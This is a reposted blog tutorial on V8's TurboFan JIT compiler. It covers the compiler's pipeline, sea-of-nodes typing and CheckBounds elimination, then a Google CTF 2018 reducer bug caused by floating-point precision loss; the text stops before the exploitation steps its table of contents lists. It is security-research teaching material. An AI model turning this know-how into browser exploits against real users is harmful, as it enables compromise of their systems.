-
Posts
18725 -
Joined
-
Last visited
-
Days Won
707
Everything posted by Nytro
-
Introduction to TurboFan Date Mon 28 January 2019 By Jeremy "__x86" Fetiveau Category exploitation Tags v8 turbofan exploitation Introduction Ages ago I wrote a blog post here called first dip in the kernel pool, this year we're going to swim in a sea of nodes! The current trend is to attack JavaScript engines and more specifically, optimizing JIT compilers such as V8's TurboFan, SpiderMonkey's IonMonkey, JavaScriptCore's Data Flow Graph (DFG) & Faster Than Light (FTL) or Chakra's Simple JIT & FullJIT. In this article we're going to discuss TurboFan and play along with the sea of nodes structure it uses. Then, we'll study a vulnerable optimization pass written by @_tsuro for Google's CTF 2018 and write an exploit for it. We’ll be doing that on a x64 Linux box but it really is the exact same exploitation for Windows platforms (simply use a different shellcode!). If you want to follow along, you can check out the associated repo. Table of contents: Introduction Setup Building v8 The d8 shell Preparing Turbolizer Compilation pipeline Sea of Nodes Control edges Value edges Effect edges Experimenting with the optimization phases Playing with NumberAdd Graph builder phase Typer phase Type lowering Range types CheckBounds nodes Simplified lowering Playing with various addition opcodes SpeculativeSafeIntegerAdd SpeculativeNumberAdd Int32Add JSAdd NumberAdd The DuplicateAdditionReducer challenge Understanding the reduction Understanding the bug Precision loss with IEEE-754 doubles Exploitation Improving the primitive Step 0 : Corrupting a FixedDoubleArray Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store Step 2 : Getting a fake object Step 3 : Arbitrary read/write primitive Step 4 : Overwriting WASM RWX memory Full exploit Conclusion Recommended reading Setup Building v8 Building v8 is very easy. You can simply fetch the sources using depot tools and then build using the following commands: fetch v8 gclient sync ./build/install-build-deps.sh tools/dev/gm.py x64.release Please note that whenever you're updating the sources or checking out a specific commit, do gclient sync or you might be unable to build properly. The d8 shell A very convenient shell called d8 is provided with the engine. For faster builds, limit the compilation to this shell: ~/v8$ ./tools/dev/gm.py x64.release d8 Try it: ~/v8$ ./out/x64.release/d8 V8 version 7.3.0 (candidate) d8> print("hello doare") hello doare Many interesting flags are available. List them using d8 --help. In particular, v8 comes with runtime functions that you can call from JavaScript using the % prefix. To enable this syntax, you need to use the flag --allow-natives-syntax. Here is an example: $ d8 --allow-natives-syntax V8 version 7.3.0 (candidate) d8> let a = new Array('d','o','a','r','e') undefined d8> %DebugPrint(a) DebugPrint: 0x37599d40aee1: [JSArray] - map: 0x01717e082d91 <Map(PACKED_ELEMENTS)> [FastProperties] - prototype: 0x39ea1928fdb1 <JSArray[0]> - elements: 0x37599d40af11 <FixedArray[5]> [PACKED_ELEMENTS] - length: 5 - properties: 0x0dfc80380c19 <FixedArray[0]> { #length: 0x3731486801a1 <AccessorInfo> (const accessor descriptor) } - elements: 0x37599d40af11 <FixedArray[5]> { 0: 0x39ea1929d8d9 <String[#1]: d> 1: 0x39ea1929d8f1 <String[#1]: o> 2: 0x39ea1929d8c1 <String[#1]: a> 3: 0x39ea1929d909 <String[#1]: r> 4: 0x39ea1929d921 <String[#1]: e> } 0x1717e082d91: [Map] - type: JS_ARRAY_TYPE - instance size: 32 - inobject properties: 0 - elements kind: PACKED_ELEMENTS - unused property fields: 0 - enum length: invalid - back pointer: 0x01717e082d41 <Map(HOLEY_DOUBLE_ELEMENTS)> - prototype_validity cell: 0x373148680601 <Cell value= 1> - instance descriptors #1: 0x39ea192909f1 <DescriptorArray[1]> - layout descriptor: (nil) - transitions #1: 0x39ea192909c1 <TransitionArray[4]>Transition array #1: 0x0dfc80384b71 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENTS) -> 0x01717e082de1 <Map(HOLEY_ELEMENTS)> - prototype: 0x39ea1928fdb1 <JSArray[0]> - constructor: 0x39ea1928fb79 <JSFunction Array (sfi = 0x37314868ab01)> - dependent code: 0x0dfc803802b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0 ["d", "o", "a", "r", "e"] If you want to know about existing runtime functions, simply go to src/runtime/ and grep on all the RUNTIME_FUNCTION (this is the macro used to declare a new runtime function). Preparing Turbolizer Turbolizer is a tool that we are going to use to debug TurboFan's sea of nodes graph. cd tools/turbolizer npm i npm run-script build python -m SimpleHTTPServer When you execute a JavaScript file with --trace-turbo (use --trace-turbo-filter to limit to a specific function), a .cfg and a .json files are generated so that you can get a graph view of different optimization passes using Turbolizer. Simply go to the web interface using your favourite browser (which is Chromium of course) and select the file from the interface. Compilation pipeline Let's take the following code. let f = (o) => { var obj = [1,2,3]; var x = Math.ceil(Math.random()); return obj[o+x]; } for (let i = 0; i < 0x10000; ++i) { f(i); } We can trace optimizations with --trace-opt and observe that the function f will eventually get optimized by TurboFan as you can see below. $ d8 pipeline.js --trace-opt [marking 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> for optimized recompilation, reason: small function, ICs with typeinfo: 4/4 (100%), generic ICs: 0/4 (0%)] [marking 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 2/7 (28%)] [compiling method 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> using TurboFan] [optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> - took 23.583, 25.899, 0.444 ms] [completed optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)>] [compiling method 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> using TurboFan OSR] [optimizing 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> - took 18.238, 87.603, 0.874 ms] We can look at the code object of the function before and after optimization using %DisassembleFunction. // before 0x17de4c02061: [Code] - map: 0x0868f07009d9 <Map> kind = BUILTIN name = InterpreterEntryTrampoline compiler = unknown address = 0x7ffd9c25d340 // after 0x17de4c82d81: [Code] - map: 0x0868f07009d9 <Map> kind = OPTIMIZED_FUNCTION stack_slots = 8 compiler = turbofan address = 0x7ffd9c25d340 What happens is that v8 first generates ignition bytecode. If the function gets executed a lot, TurboFan will generate some optimized code. Ignition instructions gather type feedback that will help for TurboFan's speculative optimizations. Speculative optimization means that the code generated will be made upon assumptions. For instance, if we've got a function move that is always used to move an object of type Player, optimized code generated by Turbofan will expect Player objects and will be very fast for this case. class Player{} class Wall{} function move(o) { // ... } player = new Player(); move(player) move(player) ... // ... optimize code! the move function handles very fast objects of type Player move(player) However, if 10 minutes later, for some reason, you move a Wall instead of a Player, that will break the assumptions originally made by TurboFan. The generated code was very fast, but could only handle Player objects. Therefore, it needs to be destroyed and some ignition bytecode will be generated instead. This is called deoptimization and it has a huge performance cost. If we keep moving both Wall and Player, TurboFan will take this into account and optimize again the code accordingly. Let's observe this behaviour using --trace-opt and --trace-deopt ! class Player{} class Wall{} function move(obj) { var tmp = obj.x + 42; var x = Math.random(); x += 1; return tmp + x; } for (var i = 0; i < 0x10000; ++i) { move(new Player()); } move(new Wall()); for (var i = 0; i < 0x10000; ++i) { move(new Wall()); } $ d8 deopt.js --trace-opt --trace-deopt [marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)] [compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan] [optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 23.374, 15.701, 0.379 ms] [completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>] // [...] [deoptimizing (DEOPT eager): begin 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> (opt #0) @1, FP to SP delta: 24, caller sp: 0x7ffcd23cba98] ;;; deoptimize at <deopt.js:5:17>, wrong map // [...] [deoptimizing (eager): end 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> @1 => node=0, pc=0x7fa245e11e60, caller sp=0x7ffcd23cba98, took 0.755 ms] [marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)] [compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan] [optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 11.599, 10.742, 0.573 ms] [completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>] // [...] The log clearly shows that when encountering the Wall object with a different map (understand "type") it deoptimizes because the code was only meant to deal with Player objects. If you are interested to learn more about this, I recommend having a look at the following ressources: TurboFan Introduction to speculative optimization in v8, v8 behind the scenes, Shape and v8 resources. Sea of Nodes Just a few words on sea of nodes. TurboFan works on a program representation called a sea of nodes. Nodes can represent arithmetic operations, load, stores, calls, constants etc. There are three types of edges that we describe one by one below. Control edges Control edges are the same kind of edges that you find in Control Flow Graphs. They enable branches and loops. Value edges Value edges are the edges you find in Data Flow Graphs. They show value dependencies. Effect edges Effect edges order operations such as reading or writing states. In a scenario like obj[x] = obj[x] + 1 you need to read the property x before writing it. As such, there is an effect edge between the load and the store. Also, you need to increment the read property before storing it. Therefore, you need an effect edge between the load and the addition. In the end, the effect chain is load -> add -> store as you can see below. If you would like to learn more about this you may want to check this TechTalk on TurboFan JIT design or this blog post. Experimenting with the optimization phases In this article we want to focus on how v8 generates optimized code using TurboFan. As mentioned just before, TurboFan works with sea of nodes and we want to understand how this graph evolves through all the optimizations. This is particularly interesting to us because some very powerful security bugs have been found in this area. Recent TurboFan vulnerabilities include incorrect typing of Math.expm1, incorrect typing of String.(last)IndexOf (that I exploited here) or incorrect operation side-effect modeling. In order to understand what happens, you really need to read the code. Here are a few places you want to look at in the source folder : src/builtin Where all the builtins functions such as Array#concat are implemented src/runtime Where all the runtime functions such as %DebugPrint are implemented src/interpreter/interpreter-generator.cc Where all the bytecode handlers are implemented src/compiler Main repository for TurboFan! src/compiler/pipeline.cc The glue that builds the graph, runs every phase and optimizations passes etc src/compiler/opcodes.h Macros that defines all the opcodes used by TurboFan src/compiler/typer.cc Implements typing via the Typer reducer src/compiler/operation-typer.cc Implements some more typing, used by the Typer reducer src/compiler/simplified-lowering.cc Implements simplified lowering, where some CheckBounds elimination will be done Playing with NumberAdd Let's consider the following function : function opt_me() { let x = Math.random(); let y = x + 2; return y + 3; } Simply execute it a lot to trigger TurboFan or manually force optimization with %OptimizeFunctionOnNextCall. Run your code with --trace-turbo to generate trace files for turbolizer. Graph builder phase We can look at the very first generated graph by selecting the "bytecode graph builder" option. The JSCall node corresponds to the Math.random call and obviously the NumberConstant and SpeculativeNumberAdd nodes are generated because of both x+2 and y+3 statements. Typer phase After graph creation comes the optimization phases, which as the name implies run various optimization passes. An optimization pass can be called during several phases. One of its early optimization phase, is called the TyperPhase and is run by OptimizeGraph. The code is pretty self-explanatory. // pipeline.cc bool PipelineImpl::OptimizeGraph(Linkage* linkage) { PipelineData* data = this->data_; // Type the graph and keep the Typer running such that new nodes get // automatically typed when they are created. Run<TyperPhase>(data->CreateTyper()); // pipeline.cc struct TyperPhase { void Run(PipelineData* data, Zone* temp_zone, Typer* typer) { // [...] typer->Run(roots, &induction_vars); } }; When the Typer runs, it visits every node of the graph and tries to reduce them. // typer.cc void Typer::Run(const NodeVector& roots, LoopVariableOptimizer* induction_vars) { // [...] Visitor visitor(this, induction_vars); GraphReducer graph_reducer(zone(), graph()); graph_reducer.AddReducer(&visitor); for (Node* const root : roots) graph_reducer.ReduceNode(root); graph_reducer.ReduceGraph(); // [...] } class Typer::Visitor : public Reducer { // ... Reduction Reduce(Node* node) override { // calls visitors such as JSCallTyper } // typer.cc Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) { if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) { return Type::NonInternal(); } JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction(); if (!function.shared().HasBuiltinFunctionId()) { return Type::NonInternal(); } switch (function.shared().builtin_function_id()) { case BuiltinFunctionId::kMathRandom: return Type::PlainNumber(); So basically, the TyperPhase is going to call JSCallTyper on every single JSCall node that it visits. If we read the code of JSCallTyper, we see that whenever the called function is a builtin, it will associate a Type with it. For instance, in the case of a call to the MathRandom builtin, it knows that the expected return type is a Type::PlainNumber. Type Typer::Visitor::TypeNumberConstant(Node* node) { double number = OpParameter<double>(node->op()); return Type::NewConstant(number, zone()); } Type Type::NewConstant(double value, Zone* zone) { if (RangeType::IsInteger(value)) { return Range(value, value, zone); } else if (IsMinusZero(value)) { return Type::MinusZero(); } else if (std::isnan(value)) { return Type::NaN(); } DCHECK(OtherNumberConstantType::IsOtherNumberConstant(value)); return OtherNumberConstant(value, zone); } For the NumberConstant nodes it's easy. We simply read TypeNumberConstant. In most case, the type will be Range. What about those SpeculativeNumberAdd now? We need to look at the OperationTyper. #define SPECULATIVE_NUMBER_BINOP(Name) \ Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \ lhs = SpeculativeToNumber(lhs); \ rhs = SpeculativeToNumber(rhs); \ return Name(lhs, rhs); \ } SPECULATIVE_NUMBER_BINOP(NumberAdd) #undef SPECULATIVE_NUMBER_BINOP Type OperationTyper::SpeculativeToNumber(Type type) { return ToNumber(Type::Intersect(type, Type::NumberOrOddball(), zone())); } They end-up being reduced by OperationTyper::NumberAdd(Type lhs, Type rhs) (the return Name(lhs,rhs) becomes return NumberAdd(lhs, rhs) after pre-processing). To get the types of the right input node and the left input node, we call SpeculativeToNumber on both of them. To keep it simple, any kind of Type::Number will remain the same type (a PlainNumber being a Number, it will stay a PlainNumber). The Range(n,n) type will become a Number as well so that we end-up calling NumberAdd on two Number. NumberAdd mostly checks for some corner cases like if one of the two types is a MinusZero for instance. In most cases, the function will simply return the PlainNumber type. Okay done for the Typer phase! To sum up, everything happened in : - Typer::Visitor::JSCallTyper - OperationTyper::SpeculativeNumberAdd And this is how types are treated : - The type of JSCall(MathRandom) becomes a PlainNumber, - The type of NumberConstant[n] with n != NaN & n != -0 becomes a Range(n,n) - The type of a Range(n,n) is PlainNumber - The type of SpeculativeNumberAdd(PlainNumber, PlainNumber) is PlainNumber Now the graph looks like this : Type lowering In OptimizeGraph, the type lowering comes right after the typing. // pipeline.cc Run<TyperPhase>(data->CreateTyper()); RunPrintAndVerify(TyperPhase::phase_name()); Run<TypedLoweringPhase>(); RunPrintAndVerify(TypedLoweringPhase::phase_name()); This phase goes through even more reducers. // pipeline.cc TypedOptimization typed_optimization(&graph_reducer, data->dependencies(), data->jsgraph(), data->broker()); // [...] AddReducer(data, &graph_reducer, &dead_code_elimination); AddReducer(data, &graph_reducer, &create_lowering); AddReducer(data, &graph_reducer, &constant_folding_reducer); AddReducer(data, &graph_reducer, &typed_lowering); AddReducer(data, &graph_reducer, &typed_optimization); AddReducer(data, &graph_reducer, &simple_reducer); AddReducer(data, &graph_reducer, &checkpoint_elimination); AddReducer(data, &graph_reducer, &common_reducer); Let's have a look at the TypedOptimization and more specifically TypedOptimization::Reduce. When a node is visited and its opcode is IrOpcode::kSpeculativeNumberAdd, it calls ReduceSpeculativeNumberAdd. Reduction TypedOptimization::ReduceSpeculativeNumberAdd(Node* node) { Node* const lhs = NodeProperties::GetValueInput(node, 0); Node* const rhs = NodeProperties::GetValueInput(node, 1); Type const lhs_type = NodeProperties::GetType(lhs); Type const rhs_type = NodeProperties::GetType(rhs); NumberOperationHint hint = NumberOperationHintOf(node->op()); if ((hint == NumberOperationHint::kNumber || hint == NumberOperationHint::kNumberOrOddball) && BothAre(lhs_type, rhs_type, Type::PlainPrimitive()) && NeitherCanBe(lhs_type, rhs_type, Type::StringOrReceiver())) { // SpeculativeNumberAdd(x:-string, y:-string) => // NumberAdd(ToNumber(x), ToNumber(y)) Node* const toNum_lhs = ConvertPlainPrimitiveToNumber(lhs); Node* const toNum_rhs = ConvertPlainPrimitiveToNumber(rhs); Node* const value = graph()->NewNode(simplified()->NumberAdd(), toNum_lhs, toNum_rhs); ReplaceWithValue(node, value); return Replace(node); } return NoChange(); } In the case of our two nodes, both have a hint of NumberOperationHint::kNumber because their type is a PlainNumber. Both the right and left hand side types are PlainPrimitive (PlainNumber from the NumberConstant's Range and PlainNumber from the JSCall). Therefore, a new NumberAdd node is created and replaces the SpeculativeNumberAdd. Similarly, there is a JSTypedLowering::ReduceJSCall called when the JSTypedLowering reducer is visiting a JSCall node. Because the call target is a Code Stub Assembler implementation of a builtin function, TurboFan simply creates a LoadField node and change the opcode of the JSCall node to a Call opcode. It also adds new inputs to this node. Reduction JSTypedLowering::ReduceJSCall(Node* node) { // [...] // Check if {target} is a known JSFunction. // [...] // Load the context from the {target}. Node* context = effect = graph()->NewNode( simplified()->LoadField(AccessBuilder::ForJSFunctionContext()), target, effect, control); NodeProperties::ReplaceContextInput(node, context); // Update the effect dependency for the {node}. NodeProperties::ReplaceEffectInput(node, effect); // [...] // kMathRandom is a CSA builtin, not a CPP one // builtins-math-gen.cc:TF_BUILTIN(MathRandom, CodeStubAssembler) // builtins-definitions.h: TFJ(MathRandom, 0, kReceiver) } else if (shared.HasBuiltinId() && Builtins::HasCppImplementation(shared.builtin_id())) { // Patch {node} to a direct CEntry call. ReduceBuiltin(jsgraph(), node, shared.builtin_id(), arity, flags); } else if (shared.HasBuiltinId() && Builtins::KindOf(shared.builtin_id()) == Builtins::TFJ) { // Patch {node} to a direct code object call. Callable callable = Builtins::CallableFor( isolate(), static_cast<Builtins::Name>(shared.builtin_id())); CallDescriptor::Flags flags = CallDescriptor::kNeedsFrameState; const CallInterfaceDescriptor& descriptor = callable.descriptor(); auto call_descriptor = Linkage::GetStubCallDescriptor( graph()->zone(), descriptor, 1 + arity, flags); Node* stub_code = jsgraph()->HeapConstant(callable.code()); node->InsertInput(graph()->zone(), 0, stub_code); // Code object. node->InsertInput(graph()->zone(), 2, new_target); node->InsertInput(graph()->zone(), 3, argument_count); NodeProperties::ChangeOp(node, common()->Call(call_descriptor)); } // [...] return Changed(node); } Let's quickly check the sea of nodes to indeed observe the addition of the LoadField and the change of opcode of the node #25 (note that it is the same node as before, only the opcode changed). Range types Previously, we encountered various types including the Range type. However, it was always the case of Range(n,n) of size 1. Now let's consider the following code : function opt_me(b) { let x = 10; // [1] x0 = 10 if (b == "foo") x = 5; // [2] x1 = 5 // [3] x2 = phi(x0, x1) let y = x + 2; y = y + 1000; y = y * 2; return y; } So depending on b == "foo" being true or false, x will be either 10 or 5. In SSA form, each variable can be assigned only once. So x0 and x1 will be created for 10 and 5 at lines [1] and [2]. At line [3], the value of x (x2 in SSA) will be either x0 or x1, hence the need of a phi function. The statement x2 = phi(x0,x1) means that x2 can take the value of either x0 or x1. So what about types now? The type of the constant 10 (x0) is Range(10,10) and the range of constant 5 (x1) is Range(5,5). Without surprise, the type of the phi node is the union of the two ranges which is Range(5,10). Let's quickly draw a CFG graph in SSA form with typing. Okay, let's actually check this by reading the code. Type Typer::Visitor::TypePhi(Node* node) { int arity = node->op()->ValueInputCount(); Type type = Operand(node, 0); for (int i = 1; i < arity; ++i) { type = Type::Union(type, Operand(node, i), zone()); } return type; } The code looks exactly as we would expect it to be: simply the union of all of the input types! To understand the typing of the SpeculativeSafeIntegerAdd nodes, we need to go back to the OperationTyper implementation. In the case of SpeculativeSafeIntegerAdd(n,m), TurboFan does an AddRange(n.Min(), n.Max(), m.Min(), m.Max()). Type OperationTyper::SpeculativeSafeIntegerAdd(Type lhs, Type rhs) { Type result = SpeculativeNumberAdd(lhs, rhs); // If we have a Smi or Int32 feedback, the representation selection will // either truncate or it will check the inputs (i.e., deopt if not int32). // In either case the result will be in the safe integer range, so we // can bake in the type here. This needs to be in sync with // SimplifiedLowering::VisitSpeculativeAdditiveOp. return Type::Intersect(result, cache_->kSafeIntegerOrMinusZero, zone()); } Type OperationTyper::NumberAdd(Type lhs, Type rhs) { // [...] Type type = Type::None(); lhs = Type::Intersect(lhs, Type::PlainNumber(), zone()); rhs = Type::Intersect(rhs, Type::PlainNumber(), zone()); if (!lhs.IsNone() && !rhs.IsNone()) { if (lhs.Is(cache_->kInteger) && rhs.Is(cache_->kInteger)) { type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max()); } // [...] return type; } AddRanger is the function that actually computes the min and max bounds of the Range. Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min, double rhs_max) { double results[4]; results[0] = lhs_min + rhs_min; results[1] = lhs_min + rhs_max; results[2] = lhs_max + rhs_min; results[3] = lhs_max + rhs_max; // Since none of the inputs can be -0, the result cannot be -0 either. // However, it can be nan (the sum of two infinities of opposite sign). // On the other hand, if none of the "results" above is nan, then the // actual result cannot be nan either. int nans = 0; for (int i = 0; i < 4; ++i) { if (std::isnan(results[i])) ++nans; } if (nans == 4) return Type::NaN(); Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone()); if (nans > 0) type = Type::Union(type, Type::NaN(), zone()); // Examples: // [-inf, -inf] + [+inf, +inf] = NaN // [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN // [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN // [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN return type; } Done with the range analysis! CheckBounds nodes Our final experiment deals with CheckBounds nodes. Basically, nodes with a CheckBounds opcode add bound checks before loads and stores. Consider the following code : function opt_me(b) { let values = [42,1337]; // HeapConstant <FixedArray[2]> let x = 10; // NumberConstant[10] | Range(10,10) if (b == "foo") x = 5; // NumberConstant[5] | Range(5,5) // Phi | Range(5,10) let y = x + 2; // SpeculativeSafeIntegerAdd | Range(7,12) y = y + 1000; // SpeculativeSafeIntegerAdd | Range(1007,1012) y = y * 2; // SpeculativeNumberMultiply | Range(2014,2024) y = y & 10; // SpeculativeNumberBitwiseAnd | Range(0,10) y = y / 3; // SpeculativeNumberDivide | PlainNumber[r][s][t] y = y & 1; // SpeculativeNumberBitwiseAnd | Range(0,1) return values[y]; // CheckBounds | Range(0,1) } In order to prevent values[y] from using an out of bounds index, a CheckBounds node is generated. Here is what the sea of nodes graph looks like right after the escape analysis phase. The cautious reader probably noticed something interesting about the range analysis. The type of the CheckBounds node is Range(0,1)! And also, the LoadElement has an input FixedArray HeapConstant of length 2. That leads us to an interesting phase: the simplified lowering. Simplified lowering When visiting a node with a IrOpcode::kCheckBounds opcode, the function VisitCheckBounds is going to get called. And this function, is responsible for CheckBounds elimination which sounds interesting! Long story short, it compares inputs 0 (index) and 1 (length). If the index's minimum range value is greater than zero (or equal to) and its maximum range value is less than the length value, it triggers a DeferReplacement which means that the CheckBounds node eventually will be removed! void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) { CheckParameters const& p = CheckParametersOf(node->op()); Type const index_type = TypeOf(node->InputAt(0)); Type const length_type = TypeOf(node->InputAt(1)); if (length_type.Is(Type::Unsigned31())) { if (index_type.Is(Type::Integral32OrMinusZero())) { // Map -0 to 0, and the values in the [-2^31,-1] range to the // [2^31,2^32-1] range, which will be considered out-of-bounds // as well, because the {length_type} is limited to Unsigned31. VisitBinop(node, UseInfo::TruncatingWord32(), MachineRepresentation::kWord32); if (lower()) { if (lowering->poisoning_level_ == PoisoningMitigationLevel::kDontPoison && (index_type.IsNone() || length_type.IsNone() || (index_type.Min() >= 0.0 && index_type.Max() < length_type.Min()))) { // The bounds check is redundant if we already know that // the index is within the bounds of [0.0, length[. DeferReplacement(node, node->InputAt(0)); } else { NodeProperties::ChangeOp( node, simplified()->CheckedUint32Bounds(p.feedback())); } } // [...] } Once again, let's confirm that by playing with the graph. We want to look at the CheckBounds before the simplified lowering and observe its inputs. We can easily see that Range(0,1).Max() < 2 and Range(0,1).Min() >= 0. Therefore, node 58 is going to be replaced as proven useless by the optimization passes analysis. After simplified lowering, the graph looks like this : Playing with various addition opcodes If you look at the file stopcode.h we can see various types of opcodes that correspond to some kind of add primitive. V(JSAdd) V(NumberAdd) V(SpeculativeNumberAdd) V(SpeculativeSafeIntegerAdd) V(Int32Add) // many more [...] So, without going into too much details we're going to do one more experiment. Let's make small snippets of code that generate each one of these opcodes. For each one, we want to confirm we've got the expected opcode in the sea of node. SpeculativeSafeIntegerAdd let opt_me = (x) => { return x + 1; } for (var i = 0; i < 0x10000; ++i) opt_me(i); %DebugPrint(opt_me); %SystemBreak(); In this case, TurboFan speculates that x will be an integer. This guess is made due to the type feedback we mentioned earlier. Indeed, before kicking out TurboFan, v8 first quickly generates ignition bytecode that gathers type feedback. $ d8 speculative_safeintegeradd.js --allow-natives-syntax --print-bytecode --print-bytecode-filter opt_me [generated bytecode for function: opt_me] Parameter count 2 Frame size 0 13 E> 0xceb2389dc72 @ 0 : a5 StackCheck 24 S> 0xceb2389dc73 @ 1 : 25 02 Ldar a0 33 E> 0xceb2389dc75 @ 3 : 40 01 00 AddSmi [1], [0] 37 S> 0xceb2389dc78 @ 6 : a9 Return Constant pool (size = 0) Handler Table (size = 0) The x + 1 statement is represented by the AddSmi ignition opcode. If you want to know more, Franziska Hinkelmann wrote a blog post about ignition bytecode. Let's read the code to quickly understand the semantics. // Adds an immediate value <imm> to the value in the accumulator. IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) { BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback); } This code means that everytime this ignition opcode is executed, it will gather type feedback to to enable TurboFan’s speculative optimizations. We can examine the type feedback vector (which is the structure containing the profiling data) of a function by using %DebugPrint or the job gdb command on a tagged pointer to a FeedbackVector. DebugPrint: 0x129ab460af59: [Function] // [...] - feedback vector: 0x1a5d13f1dd91: [FeedbackVector] in OldSpace // [...] gef➤ job 0x1a5d13f1dd91 0x1a5d13f1dd91: [FeedbackVector] in OldSpace // ... - slot #0 BinaryOp BinaryOp:SignedSmall { // actual type feedback [0]: 1 } Thanks to this profiling, TurboFan knows it can generate a SpeculativeSafeIntegerAdd. This is exactly the reason why it is called speculative optimization (TurboFan makes guesses, assumptions, based on this profiling). However, once optimized, if opt_me is called with a completely different parameter type, there would be a deoptimization. SpeculativeNumberAdd let opt_me = (x) => { return x + 1000000000000; } opt_me(42); %OptimizeFunctionOnNextCall(opt_me); opt_me(4242); If we modify a bit the previous code snippet and use a higher value that can't be represented by a small integer (Smi), we'll get a SpeculativeNumberAdd instead. TurboFan speculates about the type of x and relies on type feedback. Int32Add let opt_me= (x) => { let y = x ? 10 : 20; return y + 100; } opt_me(true); %OptimizeFunctionOnNextCall(opt_me); opt_me(false); At first, the addition y + 100 relies on speculation. Thus, the opcode SpeculativeSafeIntegerAdd is being used. However, during the simplified lowering phase, TurboFan understands that y + 100 is always going to be an addition between two small 32 bits integers, thus lowering the node to a Int32Add. Before After JSAdd let opt_me = (x) => { let y = x ? ({valueOf() { return 10; }}) : ({[Symbol.toPrimitive]() { return 20; }}); return y + 1; } opt_me(true); %OptimizeFunctionOnNextCall(opt_me); opt_me(false); In this case, y is a complex object and we need to call a slow JSAdd opcode to deal with this kind of situation. NumberAdd let opt_me = (x) => { let y = x ? 10 : 20; return y + 1000000000000; } opt_me(true); %OptimizeFunctionOnNextCall(opt_me); opt_me(false); Like for the SpeculativeNumberAdd example, we add a value that can't be represented by an integer. However, this time there is no speculation involved. There is no need for any kind of type feedback since we can guarantee that y is an integer. There is no way to make y anything other than an integer. The DuplicateAdditionReducer challenge The DuplicateAdditionReducer written by Stephen Röttger for Google CTF 2018 is a nice TurboFan challenge that adds a new reducer optimizing cases like x + 1 + 1. Understanding the reduction Let’s read the relevant part of the code. Reduction DuplicateAdditionReducer::Reduce(Node* node) { switch (node->opcode()) { case IrOpcode::kNumberAdd: return ReduceAddition(node); default: return NoChange(); } } Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) { DCHECK_EQ(node->op()->ControlInputCount(), 0); DCHECK_EQ(node->op()->EffectInputCount(), 0); DCHECK_EQ(node->op()->ValueInputCount(), 2); Node* left = NodeProperties::GetValueInput(node, 0); if (left->opcode() != node->opcode()) { return NoChange(); // [1] } Node* right = NodeProperties::GetValueInput(node, 1); if (right->opcode() != IrOpcode::kNumberConstant) { return NoChange(); // [2] } Node* parent_left = NodeProperties::GetValueInput(left, 0); Node* parent_right = NodeProperties::GetValueInput(left, 1); if (parent_right->opcode() != IrOpcode::kNumberConstant) { return NoChange(); // [3] } double const1 = OpParameter<double>(right->op()); double const2 = OpParameter<double>(parent_right->op()); Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2)); NodeProperties::ReplaceValueInput(node, parent_left, 0); NodeProperties::ReplaceValueInput(node, new_const, 1); return Changed(node); // [4] } Basically that means we've got 4 different code paths (read the code comments) when reducing a NumberAdd node. Only one of them leads to a node change. Let's draw a schema representing all of those cases. Nodes in red to indicate they don't satisfy a condition, leading to a return NoChange. The case [4] will take both NumberConstant's double value and add them together. It will create a new NumberConstant node with a value that is the result of this addition. The node's right input will become the newly created NumberConstant while the left input will be replaced by the left parent's left input. Understanding the bug Precision loss with IEEE-754 doubles V8 represents numbers using IEEE-754 doubles. That means it can encode integers using 52 bits. Therefore the maximum value is pow(2,53)-1 which is 9007199254740991. Number above this value can't all be represented. As such, there will be precision loss when computing with values greater than that. A quick experiment in JavaScript can demonstrate this problem where we can get to strange behaviors. d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> x 9007199254740992 d8> x + 1 9007199254740992 d8> 9007199254740993 == 9007199254740992 true d8> x + 2 9007199254740994 d8> x + 3 9007199254740996 d8> x + 4 9007199254740996 d8> x + 5 9007199254740996 d8> x + 6 9007199254740998 Let's try to better understand this. 64 bits IEEE 754 doubles are represented using a 1-bit sign, 11-bit exponent and a 52-bit mantissa. When using the normalized form (exponent is non null), to compute the value, simply follow the following formula. value = 